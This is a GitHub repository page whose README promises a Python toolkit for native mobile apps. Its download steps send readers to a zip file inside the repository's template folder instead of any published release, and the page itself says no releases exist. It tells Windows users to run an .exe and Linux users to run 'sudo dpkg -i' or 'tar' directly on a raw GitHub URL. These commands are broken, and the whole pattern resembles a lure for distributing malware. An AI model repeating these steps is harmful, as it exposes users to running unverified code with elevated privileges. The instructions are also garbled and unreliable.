Skip to content

🌍 Create native Android and iOS apps using Python with PythonNative, a cross-platform toolkit for building UI, managing lifecycle events, and accessing device features.

Notifications You must be signed in to change notification settings

nwaebom66/pythonnative

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ“± pythonnative - Create Mobile Apps Easily

πŸš€ Getting Started

Welcome to pythonnative! This tool allows you to build real native Android and iOS applications using Python. It comes with a simple user interface, a command-line tool, and templates to get you started quickly.

πŸ“₯ Download & Install

You can get the latest version of pythonnative from our Releases page.

Download pythonnative

To download, visit this page: Download pythonnative.

Steps to Download

  1. Click the link above to visit the Releases page.
  2. Look for the latest version.
  3. Click on the version to view available files.
  4. Download the file suitable for your operating system.

πŸ“‹ System Requirements

Before you start, ensure your system meets the following requirements:

  • Operating System:

    • Windows 10 or higher
    • macOS 10.14 or higher
    • Linux distribution with latest updates
  • Python Version: Must have Python 3.7 or higher installed.

  • Memory: At least 2GB of RAM (4GB recommended).

  • Disk Space: Minimum 150MB of available space.

πŸ”§ Setting Up

After downloading the file, follow these steps to set up pythonnative on your system.

For Windows Users:

  1. Locate the downloaded .exe file.
  2. Double-click to run it.
  3. Follow the on-screen instructions to complete the installation.

For macOS Users:

  1. Locate the downloaded .dmg file.
  2. Open it and drag the pythonnative app to your Applications folder.
  3. Eject the .dmg file after installation.

For Linux Users:

  1. Locate the downloaded package (https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip or .deb file).
  2. Open a terminal window.
  3. Navigate to the downloaded file's location.
  4. Run the command to extract or install. For example:
    tar -xvzf https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip
    or
    sudo dpkg -i https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip

πŸŽ‰ Running pythonnative

After installation, you will be able to access pythonnative through your applications menu or command line.

Using the Command Line:

  1. Open your command line interface.
  2. Type the following command to start pythonnative:
    pythonnative
  3. Follow the prompts to create or manage your mobile projects.

Using the GUI:

  1. Open the pythonnative app from your applications.
  2. Select the action you want to perform, such as creating a new project or opening an existing one.

πŸ›  Features

  • Cross-Platform Development: Write your code once, and run it on both Android and iOS with minor adjustments.
  • Lightweight UI Toolkit: Build user interfaces easily with our simple widget toolkit.
  • Command-Line Interface (CLI): Powerful tools for experts to manage projects effectively.
  • Templates: Start projects quickly with pre-built templates optimized for various use cases.

πŸ“š Getting Help

If you encounter any issues, you can visit our FAQs or check our Documentation for detailed guides.

Community Support

Join our community on forums or social media. Share your experiences, ask questions, and help others.

πŸ”— Useful Links

Thank you for choosing pythonnative! Enjoy building your mobile applications.

About

🌍 Create native Android and iOS apps using Python with PythonNative, a cross-platform toolkit for building UI, managing lifecycle events, and accessing device features.

Topics

Resources

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •